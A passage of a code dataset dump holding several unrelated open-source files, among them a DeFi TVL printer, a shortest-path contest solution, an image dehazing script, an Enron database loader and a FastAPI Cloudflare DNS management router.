)\n","repo_name":"openinframap/openinframap","sub_path":"web-backend/wikidata.py","file_name":"wikidata.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"27"} +{"seq_id":"14439406829","text":"from __future__ import annotations\n\nimport toolstr\n\nimport ctc.config\nfrom ctc import cli\nfrom . import llama_requests\n\n\n#\n# # comparisons\n#\n\n\nasync def async_print_protocols_tvls(\n *,\n verbose: bool = False,\n n: int = 50,\n filter_category: str | None = None,\n filter_chain: str | None = None,\n) -> None:\n\n styles = cli.get_cli_styles()\n\n data = await llama_requests.async_get_protocols_tvls(\n category=filter_category,\n chain=filter_chain,\n )\n\n keys = [\n 'name',\n 'category',\n 'chain',\n 'tvl',\n ]\n\n if verbose:\n keys.append('slug')\n\n rows = []\n for datum in data[:n]:\n name = ' '.join(datum['name'].split(' ')[:2])\n row = [name, datum['category'], datum['chain'], datum['tvl']]\n if verbose:\n row.append(datum['slug'])\n rows.append(row)\n if n < len(data):\n rows.append(['...'] * len(keys))\n\n toolstr.print_text_box('TVL by Protocol', style=styles['title'])\n print()\n toolstr.print_table(\n rows,\n labels=keys,\n column_formats={\n 'tvl': {\n 'order_of_magnitude': True,\n 'decimals': 2,\n 'trailing_zeros': True,\n 'prefix': '$',\n },\n },\n border=styles['comment'],\n label_style=styles['title'],\n column_styles={\n 'tvl': styles['description'],\n },\n )\n\n\nasync def async_print_chains_tvls(n: int = 50) -> None:\n\n styles = cli.get_cli_styles()\n\n data = await llama_requests.async_get_chains_tvls()\n\n keys = [\n 'name',\n 'tvl',\n ]\n\n data = sorted(data, key=lambda datum: float(datum['tvl']), reverse=True)\n\n rows = []\n for datum in data[:n]:\n name = ' '.join(datum['name'].split(' ')[:2])\n row = [name, datum['tvl']]\n rows.append(row)\n\n if len(data) > n:\n rows.append(['...'] * len(keys))\n\n toolstr.print_text_box('TVL by Chain', style=styles['title'])\n print()\n toolstr.print_table(\n rows,\n labels=keys,\n column_formats={\n 'tvl': {\n 'order_of_magnitude': True,\n 'decimals': 2,\n 'trailing_zeros': True,\n 'prefix': '$',\n },\n },\n border=styles['comment'],\n label_style=styles['title'],\n column_styles={\n 'tvl': styles['description'],\n },\n )\n\n\n#\n# # historical charting\n#\n\n\nasync def async_print_historical_defi_tvl() -> None:\n\n styles = cli.get_cli_styles()\n\n data = await llama_requests.async_get_historical_defi_tvl()\n\n plot = toolstr.render_line_plot(\n xvals=data['timestamp'],\n yvals=data['tvl'],\n n_rows=10,\n n_columns=60,\n line_style=styles['description'],\n chrome_style=styles['comment'],\n tick_label_style=styles['metavar'],\n yaxis_kwargs={'tick_label_format': {'prefix': '$'}},\n char_dict=ctc.config.get_cli_chart_charset(),\n )\n\n toolstr.print_text_box('Historical Defi TVL', style=styles['title'])\n print()\n toolstr.print(plot)\n\n\nasync def async_print_historical_chain_tvl(chain: str) -> None:\n\n styles = cli.get_cli_styles()\n\n data = await llama_requests.async_get_historical_chain_tvl(chain)\n\n plot = toolstr.render_line_plot(\n xvals=data['timestamp'],\n yvals=data['tvl'],\n n_rows=10,\n n_columns=60,\n line_style=styles['description'],\n chrome_style=styles['comment'],\n tick_label_style=styles['metavar'],\n yaxis_kwargs={'tick_label_format': {'prefix': '$'}},\n char_dict=ctc.config.get_cli_chart_charset(),\n )\n\n toolstr.print_text_box(\n 'Historical ' + chain + ' TVL', style=styles['title']\n )\n print()\n toolstr.print(plot, indent=4)\n\n\nasync def async_print_historical_protocol_tvl(\n protocol: str, verbose: bool = False\n) -> None:\n\n styles = cli.get_cli_styles()\n\n uniswap = await llama_requests.async_get_historical_protocol_tvl(protocol)\n\n timestamp = []\n tvl = []\n for datum in uniswap['tvl']:\n timestamp.append(datum['date'])\n tvl.append(datum['totalLiquidityUSD'])\n\n plot = toolstr.render_line_plot(\n xvals=timestamp,\n yvals=tvl,\n n_rows=10,\n n_columns=60,\n line_style=styles['description'],\n chrome_style=styles['comment'],\n tick_label_style=styles['metavar'],\n yaxis_kwargs={'tick_label_format': {'prefix': '$'}},\n char_dict=ctc.config.get_cli_chart_charset(),\n )\n\n toolstr.print_text_box(\n 'Historical ' + protocol + ' TVL', style=styles['title']\n )\n print()\n\n if verbose:\n toolstr.print(\n toolstr.hjustify('All Chains', 'center', 70),\n indent=4,\n style=styles['title'],\n )\n toolstr.print(plot, indent=4)\n\n if verbose:\n chains = sorted(\n uniswap['currentChainTvls'].keys(),\n key=lambda chain: float(uniswap['currentChainTvls'][chain]),\n reverse=True,\n )\n\n print()\n for chain in chains:\n raw_data = uniswap['chainTvls'][chain]['tvl']\n timestamp = []\n tvl = []\n for datum in raw_data:\n timestamp.append(datum['date'])\n tvl.append(datum['totalLiquidityUSD'])\n\n plot = toolstr.render_line_plot(\n xvals=timestamp,\n yvals=tvl,\n n_rows=10,\n n_columns=60,\n line_style=styles['description'],\n chrome_style=styles['comment'],\n tick_label_style=styles['metavar'],\n yaxis_kwargs={'tick_label_format': {'prefix': '$'}},\n char_dict=ctc.config.get_cli_chart_charset(),\n )\n print()\n toolstr.print(\n toolstr.hjustify(chain, 'center', 70),\n indent=4,\n style=styles['title'],\n )\n print()\n toolstr.print(\n plot,\n indent=4,\n )\n print()\n","repo_name":"checkthechain/checkthechain","sub_path":"src/ctc/protocols/llama_utils/llama_tvls.py","file_name":"llama_tvls.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","stars":799,"dataset":"github-code","pt":"27"} +{"seq_id":"26713239217","text":"from heapq import heappop, heappush\nimport sys\ninput = sys.stdin.readline\nINF = sys.maxsize\nN, M, K = map(int, input().split())\nmatrix = [[] for _ in range(N)]\nfor _ in range(M):\n a, b, t = map(int, input().split())\n a -= 1; b -= 1\n matrix[b].append((t, a)) # 모든 집에서 면접장으로 오는 거리를 구하는 것보다 간선을 뒤집어서 면접지를 출발지로 두고 각 집의 거리를 구하는게 빠름. K <= N 의 조건 때문에,\n # 그리고 면접장을 출발지로 잡아야, 모든 면접장에서 한꺼번에 출발해도 문제가 안생김. 기존 집을 다 0으로 만들고 다익스트라를 돌리게 되면, 도착지에 도착을 못하는 경우가 생김.\n # 모든 면접 자는 가장 가까운 면접장으로 가야함. 그러기 위해선 다른 집들을 지나가면서 면접장으로 가야함. 하지만 기존 집들의 visit을 0으로 바꿔놔버리면, 이동을 못하는 경우가 생김.\n # 하지만 면접장 끼리 이동 할 경우는 없음. 이유는 집에서 출발하여 최소거리로 면접장에 도착하면, 더이상 이동할 이유가 없음. 집에서 가장 가까운 면접장으로 면접을 보러간다했으니..\nk_list = list(map(int, input().rstrip().split())) # 면접장의 위치\nstart = []\nvisited = [INF] * N\nfor i in k_list:\n i -= 1 # 인풋이 0~N-1이 아니라 1 ~ N 이기 때문에 -1\n visited[i] = 0\n heappush(start, (0, i)) # 모든 출발지의 사람들이 가장 가까운 면접장으로 가고, 다 한꺼번에 넣고 돌려도, dijkstra가 알아서 각 면접장에서 가장 가까운 집을 구해주게 됨.\nwhile start:\n x, node = heappop(start)\n if x > visited[node]:\n continue\n for k, v in matrix[node]:\n nx = x + k\n if visited[v] > nx:\n visited[v] = nx\n heappush(start, (nx, v))\nnum = 0 # 가장 먼 집의 번호\nresult = 0 # 가장 먼 집의 거리\nfor i in range(N):\n if visited[i] > result:\n result = visited[i]\n num = i+1 # 인풋에서 받은 값을 -1 한 것을 + 1\nprint(num)\nprint(result)","repo_name":"tnpfldyd/TIL","sub_path":"baekjoon/17835.py","file_name":"17835.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"33241379637","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import trange\n\ndirections = [\n [1, 0],\n [1, -1],\n [0, -1],\n [-1, -1],\n [-1, 0],\n [-1, 1],\n [0, 1],\n [1, 1],\n]\n\n\ndef calc_occupied(a, i, j):\n occ = 0\n ymax, xmax = a.shape\n for dy, dx in directions:\n amp = 1\n while 0 < i + dy * amp < ymax and 0 < j + dx * amp < xmax:\n if a[i + dy * amp, j + dx * amp] == 1:\n occ += 1\n break\n elif a[i + dy * amp, j + dx * amp] == 0:\n break\n amp += 1\n\n return occ\n\n\ndef iterate(a):\n N = a.shape[0] - 2\n M = a.shape[1] - 2\n a_new = np.zeros_like(a)\n a_new[:, :] = np.nan\n for i in range(1, N + 1):\n for j in range(1, M + 1):\n\n if np.isnan(a[i, j]):\n a_new[i, j] = np.nan\n\n elif a[i, j] == 0:\n occupied = calc_occupied(a, i, j)\n if occupied == 0:\n a_new[i, j] = 1\n else:\n a_new[i, j] = a[i, j]\n\n elif a[i, j] == 1:\n occupied = calc_occupied(a, i, j)\n if occupied >= 5:\n a_new[i, j] = 0\n else:\n a_new[i, j] = a[i, j]\n\n return a_new\n\n\ndef main():\n with open(\"data/data_11.txt\", \"r\") as f:\n raw = f.read()\n\n raw = raw.split(\"\\n\")[:-1]\n N = len(raw)\n M = len(raw[0])\n in_array = np.array([list(x) for x in raw])\n\n a = np.zeros([N + 2, M + 2])\n a[:, :] = np.nan\n a[1:-1, 1:-1][in_array == \"L\"] = 0\n a[1:-1, 1:-1][in_array == \".\"] = np.nan\n\n prev_sum = -1\n for i in trange(1000):\n a = iterate(a)\n if prev_sum == np.nansum(a):\n plt.figure()\n plt.imshow(a, vmin=0, vmax=1)\n plt.show()\n return int(prev_sum)\n prev_sum = np.nansum(a)\n print(prev_sum)\n\n\nif __name__ == \"__main__\":\n print(main())\n","repo_name":"jaimeliew1/AdventOCode_2020","sub_path":"day11b.py","file_name":"day11b.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30347122639","text":"'''\nWrite a script that reads in the words from the words.txt file and finds and prints:\n\n1. The shortest word (if there is a tie, print all)\n2. The longest word (if there is a tie, print all)\n3. The total number of words in the file.\n\n'''\nshortest = []\nlongest = []\nn = 0\nwith open(\"words.txt\") as f:\n for line in f.readlines():\n n += 1\n if n == 1:\n shortest.append(line.strip())\n longest.append(line.strip())\n if len(line.strip()) < len(shortest[0]):\n shortest = []\n shortest[0] = line.strip()\n elif len(line.strip()) == len(shortest[0]) and line.strip() != shortest[0]:\n shortest.append(line.strip())\n if len(line.strip()) > len(longest[0]):\n longest = []\n longest.append(line.strip())\n elif len(line.strip()) == len(longest[0]) and line.strip() != longest[0]:\n longest.append(line.strip())\nprint(shortest)\nprint(longest)\nprint(f\"In total {n} words.\")\n","repo_name":"mingyyy/onsite","sub_path":"week_03/01_files/01_words_analysis.py","file_name":"01_words_analysis.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38414058726","text":"\"\"\"\nGiven an integer n, return any array containing \nn unique integers such that they add up to 0.\n\nExample 1:\nInput: n = 5\nOutput: [-7,-1,1,3,4]\nExplanation: These arrays also are accepted [-5,-1,1,2,3] , [-3,-1,2,-2,4].\n\nExample 2:\nInput: n = 3\nOutput: [-1,0,1]\n\nExample 3:\nInput: n = 1\nOutput: [0]\n\nConstraints:\n\n1 <= n <= 1000\n\"\"\"\n\nclass Solution:\n def sumZero(self, n: int) -> List[int]:\n ret = list()\n if n % 2 == 1:\n ret.append(0)\n for i in range(1, n // 2 + 1):\n ret.extend([i, -i])\n return ret\n ","repo_name":"YskSt030/LeetCode_Problems","sub_path":"1304.FindNUniqueIntegersSumuptoZero.py","file_name":"1304.FindNUniqueIntegersSumuptoZero.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71503148552","text":"import cv2\nimport os\nimport argparse\nimport json\nimport numpy as np\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--dir', type=str, default='./real_images/no_mask/two_hairties_resized')\n args = parser.parse_args()\n output_dir = args.dir + '_editted'\n if not os.path.exists(output_dir):\n \tos.mkdir(output_dir)\n\n alpha = 1.65 # Contrast control (1.0-3.0)\n beta = 0 # Brightness control (0-100)\n for f in os.listdir(args.dir):\n img = cv2.imread('%s/%s'%(args.dir, f)).copy()\n print(f)\n adjusted = cv2.convertScaleAbs(img, alpha=alpha, beta=beta)\n filename = output_dir + '/' + f\n cv2.imwrite('{}'.format(filename), adjusted)\n","repo_name":"BerkeleyAutomation/multiple-rope-detangling","sub_path":"blender-rope-sim/brighten_contrast.py","file_name":"brighten_contrast.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42859022894","text":"\"\"\"\nExample: export markers to trc\n\"\"\"\n\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom pyosim import Conf\nfrom pyosim import Markers3dOsim\nfrom project_conf import PROJECT_PATH\n\nconf = Conf(project_path=PROJECT_PATH)\nparticipants = conf.get_participants_to_process()\n\nmarkers_labels = conf.get_conf_field(participant=participants[0], field=['markers', 'targets'])\n\n\nfor iparticipant in participants:\n print(f'\\nparticipant: {iparticipant}')\n directories = conf.get_conf_field(participant=iparticipant, field=['markers', 'data'])\n assigned = conf.get_conf_field(participant=iparticipant, field=['markers', 'assigned'])\n\n for idir in directories:\n print(f'\\n\\tdirectory: {idir}')\n\n for itrial in Path(idir).glob('*.c3d'):\n blacklist = False\n # try participant's channel assignment\n for iassign in assigned:\n\n # delete some markers if particular trials (box markers during score)\n if Path(idir).stem == 'MODEL2':\n iassign = [i if n < 43 else '' for n, i in enumerate(iassign)]\n # skip some trials\n if itrial.stem[-1] == '0':\n pass\n else:\n blacklist = True\n break\n\n nan_idx = [i for i, v in enumerate(iassign) if not v]\n if nan_idx:\n iassign_without_nans = [i for i in iassign if i]\n else:\n iassign_without_nans = iassign\n\n try:\n markers = Markers3dOsim.from_c3d(itrial, names=iassign_without_nans, prefix=':')\n if nan_idx:\n # if there is any empty assignment, fill the dimension with nan\n for i in nan_idx:\n markers = np.insert(markers, i, np.nan, axis=1)\n print(f'\\t{itrial.stem} (NaNs: {nan_idx})')\n else:\n print(f'\\t{itrial.stem}')\n\n # check if dimensions are ok\n if not markers.shape[1] == len(iassign):\n raise ValueError('Wrong dimensions')\n break\n except IndexError:\n markers = []\n\n if not blacklist:\n markers.get_labels = markers_labels\n trc_filename = f\"{PROJECT_PATH / iparticipant / '0_markers' / itrial.stem}.trc\"\n markers.to_trc(filename=trc_filename)\n","repo_name":"pariterre/pyosim","sub_path":"examples/_1_markers.py","file_name":"_1_markers.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"16591530569","text":"# -*- coding: utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef dark_channel(img, size=30):\r\n r, g, b = cv2.split(img)\r\n min_img = cv2.min(r, cv2.min(g, b))\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (size, size))\r\n dc_img = cv2.erode(min_img, kernel)\r\n return dc_img\r\n\r\n\r\ndef get_atmo(img, percent=0.005):\r\n mean_perpix = np.mean(img, axis=2).reshape(-1)\r\n mean_topper = mean_perpix[:int(img.shape[0] * img.shape[1] * percent)]\r\n return np.mean(mean_topper)\r\n\r\n\r\ndef get_trans(img, atom, w=0.95):\r\n x = img / atom\r\n t = 1 - w * dark_channel(x, 15)\r\n return t\r\n\r\n\r\ndef guided_filter(p, i, r, e):\r\n # 1\r\n mean_I = cv2.boxFilter(i, cv2.CV_64F, (r, r))\r\n mean_p = cv2.boxFilter(p, cv2.CV_64F, (r, r))\r\n corr_I = cv2.boxFilter(i * i, cv2.CV_64F, (r, r))\r\n corr_Ip = cv2.boxFilter(i * p, cv2.CV_64F, (r, r))\r\n # 2\r\n var_I = corr_I - mean_I * mean_I\r\n cov_Ip = corr_Ip - mean_I * mean_p\r\n # 3\r\n a = cov_Ip / (var_I + e)\r\n b = mean_p - a * mean_I\r\n # 4\r\n mean_a = cv2.boxFilter(a, cv2.CV_64F, (r, r))\r\n mean_b = cv2.boxFilter(b, cv2.CV_64F, (r, r))\r\n # 5\r\n q = mean_a * i + mean_b\r\n return q\r\n\r\n\r\ndef recover(img, t, a):\r\n r = np.empty_like(img)\r\n for i in range(3):\r\n r[:, :, i] = (img[:, :, i] - a) / t + a\r\n return r\r\n\r\n\r\ndef DCP_dehaze(im):\r\n img = im.astype('float64') / 255\r\n img_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY).astype('float64') / 255\r\n\r\n atmo = get_atmo(img)\r\n trans = get_trans(img, atmo)\r\n trans_guided = guided_filter(trans, img_gray, 20, 0.0001)\r\n trans_guided = cv2.max(trans_guided, 0.25)\r\n result = recover(img, trans_guided, atmo)\r\n\r\n return result.astype(np.float32)\r\n\r\n\r\nif __name__ == '__main__':\r\n path = r\"G:\\Digital Image Processing\\Test_img\\0010_0.95_0.16.jpg\"\r\n im = cv2.imread(path)\r\n res = DCP_dehaze(im)\r\n plt.title('DCP')\r\n plt.imshow(cv2.cvtColor(res.astype(np.float32), cv2.COLOR_BGR2RGB))\r\n plt.show()\r\n","repo_name":"xue362/Image-Dehaze-DCP-and-Encoder-Decoder-Net","sub_path":"DCP.py","file_name":"DCP.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"16777877544","text":"import click\nfrom ..cli.util import with_app\n\n\n@click.command(name=\"show-interface\")\n@click.argument(\"model\", type=click.STRING)\n@click.option(\"--depth\", \"-d\", type=int, default=0)\n@with_app\ndef show_interface(app, model, depth=0):\n \"\"\"\n Show the import interface for a database model.\n \"\"\"\n # `using` is related to this issue:\n # https://github.com/ipython/ipython/issues/11523\n m = getattr(app.database.interface, model)\n m().pretty_print(nested=depth)\n","repo_name":"EarthCubeGeochron/Sparrow","sub_path":"backend/sparrow/core/import_helpers/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"27"} +{"seq_id":"34527326146","text":"import sqlite3\nimport pickle\nfrom sklearn.externals import joblib \nfrom dijktras_algorithm import *\nfrom sklearn.externals import joblib\nimport numpy as np\n\ndef push_file(value, column_name, table_name):\n\t\"\"\"\n\tTries to insert an ID (if it does not exist yet)\n\twith a specific value in a second column\n\t\"\"\"\n\tc.execute(\"INSERT OR IGNORE INTO {tn} ({cn}) VALUES ({v})\".format(tn=table_name, cn=column_name, v=value))\n\n\ndef push_2_values(value1, value2, column_name, table_name):\n\t\"\"\"\n\tInserts 2 values into 1 slot in the db.\n\t\"\"\"\n\tc.execute(\"INSERT INTO {tn} ({cn}) VALUES ({v1}, {v2})\".format(tn=table_name, cn=column_name, v1=value1, v2 = value2))\n\t\n\nif __name__ == \"__main__\":\n\n\tall_formality_scores = joblib.load(\"normalized_formality_scores.pkl\")\n\tall_sentiment_scores = joblib.load(\"normalized_sentiment_scores.pkl\")\n\texchanges_CC = joblib.load(\"exchange_number_map_cc.p\")\n\n\tsqlite_file = 'Enron_Entity.db'\n\ttable_name = 'Nodegraph'\n\tPERSON1 = 'PERSON1'\n\tPERSON2 = 'PERSON2'\n\tTIME_KNOWN = 'TIMEKNOWN'\n\tFORMALITY_SCORE = 'FORMALITY'\n\tSENTIMENT_SCORE = 'SENTIMENT'\n\tNUM_EXCHANGES = 'EXCHANGECOUNT'\n\tHEURISTIC_SCORE = 'SCORE'\n\n\t# Connecting to the database file\n\tconn = sqlite3.connect(sqlite_file)\n\tc = conn.cursor()\n\n\t# Add overall formality score\n\tcc = 1\n\tfor i in range(len(all_formality_scores)):\n\t\tvalue = all_formality_scores[i][1][0]\n\t\tpush_file(value, FORMALITY_SCORE, table_name)\n\t\tprint (\"FORMALITY_SCORE ... inserting row #: \", cc) \n\t\tcc += 1\n\n\t# Add overall sentiment score\n\tcc = 1\n\tfor i in range(len(all_sentiment_scores)):\n\t\tvalue = all_sentiment_scores[i][0]\n\t\tpush_file(value, SENTIMENT_SCORE, table_name)\n\t\tprint (\"SENTIMENT_SCORE ... inserting row #: \", cc) \n\t\tcc += 1\n\n\n\texchanges_CC = joblib.load(\"exchange_number_map_cc.p\")\n\tp1 = []\n\tp2 = []\n\tnum_exchanges = []\n\tfor key, value in exchanges_CC.items():\n\t\tp1.append(key[0])\n\t\tp2.append(key[1])\n\t\tnum_exchanges.append(value)\n\n\t# Add person 1\n\tcc = 1\n\tfor thing in p1:\n\t\tt = thing.split()\n\t\tvalue = thing\n\t\tpush_file(thing, PERSON1, table_name)\n\t\tprint (\"PERSON1 ... inserting row #: \", cc) \n\t\tcc += 1\n\n\t# Add person 2\n\tcc = 1\n\tfor thing in p2:\n\t\tvalue = thing\n\t\tpush_file(value, PERSON2, table_name)\n\t\tprint (\"PERSON2 ... inserting row #: \", cc) \n\t\tcc += 1\n\n\tconn.commit()\n\tconn.close()\n\n\n","repo_name":"dhanush-ai1990/CapitalMarketsAmplify","sub_path":"Code/Relationship_Understanding/push_data.py","file_name":"push_data.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22723563205","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm, datasets\n\n\n\ndef main():\n # X = np.array([[1, 1], [2, 2], [2, 0], [0, 0], [1, 0], [0, 1]])\n # y = np.array([1, 1, 1, -1, -1, -1])\n X = np.array([[1, 1], [2, 2], [2, 0], [0, 0], [1, 0], [0, 1]])\n y = np.array([1, 1, 1, -1, -1, -1])\n C = 100 # SVM regularization parameter\n clf = svm.SVC(C=C, kernel='linear')\n clf = clf.fit(X, y)\n print('Support Vectors: ', clf.support_vectors_)\n print('Weighs: %s intercept: %s' % (clf.coef_, clf.intercept_))\n print('Dual Weights: %s' % clf.dual_coef_)\n # title for the plots\n visualize_svm(X, y, clf)\n\n\ndef visualize_svm(X, y, clf):\n X0, X1 = X[:, 0], X[:, 1]\n plt.scatter(X0, X1, c=y, cmap=plt.cm.Paired, s=30)\n ax = plt.gca()\n xlim = ax.get_xlim()\n ylim = ax.get_ylim()\n\n # create grid to evaluate model\n xx = np.linspace(xlim[0], xlim[1], 30)\n yy = np.linspace(ylim[0], ylim[1], 30)\n YY, XX = np.meshgrid(yy, xx)\n xy = np.vstack([XX.ravel(), YY.ravel()]).T\n Z = clf.decision_function(xy).reshape(XX.shape)\n\n # plot decision boundary and margins\n ax.contour(XX, YY, Z, colors='k', levels=[-1, 0, 1], alpha=0.5,\n linestyles=['--', '-', '--'])\n # plot support vectors\n ax.scatter(clf.support_vectors_[:, 0], clf.support_vectors_[:, 1], s=100,\n linewidth=1, facecolors='none')\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YingLaiLin/homework_machine_learning","sub_path":"homework_3/test_svm.py","file_name":"test_svm.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"74598064712","text":"import inspect\nfrom typing import List\n\nimport CloudFlare\n\nfrom fastapi import APIRouter, Depends, Body\nfrom fastapi.security import OAuth2PasswordBearer\nfrom pydantic import BaseModel\n\nfrom App import ext\nfrom App.response import list_response, dict_response\nfrom App.utils import dns, zone_setting\nfrom App.utils.common import get_setting\n\nrouter = APIRouter()\n\nsetting = get_setting()\n\n\nclass zone(BaseModel):\n zone_name: str\n\n\nclass purge(BaseModel):\n purge_everything: bool = False\n files: list = []\n\n\nclass zone_setting_model(BaseModel):\n id: str\n value: str\n\n\nclass zone_settings(BaseModel):\n data: List[zone_setting_model]\n\n\nclass pagerule_model(BaseModel):\n targets: list\n actions: list\n priority: int\n status: str\n\n\nclass Token(BaseModel):\n access_token: str\n token_type: str\n\n\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"/login\")\n\n\ndef get_current_user_cf(token: str = Depends(oauth2_scheme)):\n user = ext.get_current_user(token)\n return CloudFlare.CloudFlare(\n email=user.get('cloudflare_email'),\n token=user.get('user_api_key'),\n debug=setting.DEBUG\n )\n\n\ndef get_current_user(token: str = Depends(oauth2_scheme)):\n return ext.get_current_user(token)\n\n\ndef get_current_key(cf):\n return inspect.stack()[1][3] + cf._base.email\n\n\n# 获取域名列表\n\n@router.get('/zone_list', response_model=list_response)\nasync def get_zones(cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.get_zones(cf)\n\n\n# 获取域名dns解析解析记录\n@router.get('/get_dns_records', response_model=list_response)\nasync def get_dns_records(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.get_dns_records(cf, zone_id)\n\n\n# 获取记录信息\n@router.get('/get_dns_record_info', response_model=dict_response)\nasync def get_dns_record_info(zone_id: str, dns_record_id: str,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.get_dns_record_info(cf, zone_id, dns_record_id)\n\n\n# 获取域名信息\n@router.get('/get_zone_info', response_model=dict_response)\nasync def get_zone_info(zone_name: str = None, zone_id: str = None,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.get_zone_info(cf, zone_name, zone_id)\n\n\n# 新增记录\n@router.post('/do_dns_record_create', response_model=dict_response)\nasync def do_dns_record_create(zone_id: str, dns_record: dns.Dns_record,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.do_dns_record_create(\n cf, zone_id, dns_record)\n\n\n# 更新记录\n@router.put('/do_dns_record_update', response_model=dict_response)\nasync def do_dns_record_update(zone_id: str, dns_record_id: str, dns_record: dns.Dns_record,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.do_dns_record_update(\n cf, zone_id, dns_record_id, dns_record)\n\n\n# 删除记录\n@router.delete('/do_dns_record_delete', response_model=dict_response)\nasync def do_dns_record_delete(zone_id: str, dns_record_id: str,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.do_dns_record_delete(\n cf, zone_id, dns_record_id)\n\n\n# 删除域名\n@router.delete('/do_zone_delete', response_model=dict_response)\nasync def do_zone_delete(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.do_zone_delete(cf, zone_id)\n\n\n# 新增域名\n@router.post('/do_zone_create', response_model=dict_response)\nasync def do_zone_create(zone: zone, user=Depends(get_current_user),\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.do_zone_create(cf, setting.HOST_KEY, user.get('user_key'), zone.zone_name)\n\n\n# 清理缓存\n@router.post('/do_cache_purge', response_model=dict_response)\nasync def do_cache_purge(zone_id: str, params: purge, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return dns.do_cache_purge(cf, zone_id, params)\n\n\n# 获取域名所有设置\n@router.get('/get_all_zone_settings', response_model=list_response)\nasync def get_all_zone_settings(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.get_all_zone_settings(cf, zone_id)\n\n\n# 获取域名目标设置\n@router.get('/get_zone_setting', response_model=list_response)\nasync def get_all_zone_settings(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.get_all_zone_settings(cf, zone_id)\n\n\n# 批量更新域名设置\n@router.patch('/do_zone_settings_update', response_model=list_response)\nasync def do_zone_settings_update(zone_id: str, data: zone_settings,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.do_zone_settings_update(cf, zone_id, data)\n\n\n# 更新域名目标设置\n@router.patch('/do_zone_setting_update', response_model=dict_response)\nasync def do_zone_setting_update(zone_id: str, type: str, value=Body(..., embed=True),\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.do_zone_setting_update(cf, zone_id, type, value)\n\n\n# 获取页面规则\n@router.get('/get_zone_pagerules', response_model=list_response)\nasync def get_zone_pagerules(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.get_zone_pagerules(cf, zone_id)\n\n\n# 获取页面规则设置列表\n@router.get('/get_zone_pagerule_setting', response_model=list_response)\nasync def get_zone_pagerule_setting(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.get_zone_pagerule_setting(cf, zone_id)\n\n\n# 新增页面规则\n@router.post('/do_zone_pagerule_create', response_model=list_response)\nasync def do_zone_pagerule_create(zone_id: str, data: pagerule_model,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.do_zone_pagerule_create(cf, zone_id, data)\n\n\n# 删除页面规则\n@router.delete('/do_zone_pagerule_delete', response_model=list_response)\nasync def do_zone_pagerule_delete(zone_id: str, pagerule_id: str,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.do_zone_pagerule_delete(cf, zone_id, pagerule_id)\n\n\n# 获取页面规则详情\n@router.get('/get_zone_pagerule_details', response_model=list_response)\nasync def get_zone_pagerule_details(zone_id: str, pagerule_id: str,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.get_zone_pagerule_details(cf, zone_id, pagerule_id)\n\n\n# 更新页面规则\n@router.put('/do_zone_pagerule_update', response_model=dict_response)\nasync def do_zone_pagerule_update(\n zone_id: str, pagerule_id: str, data: pagerule_model,\n cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n return zone_setting.do_zone_pagerule_update(cf, zone_id, pagerule_id, 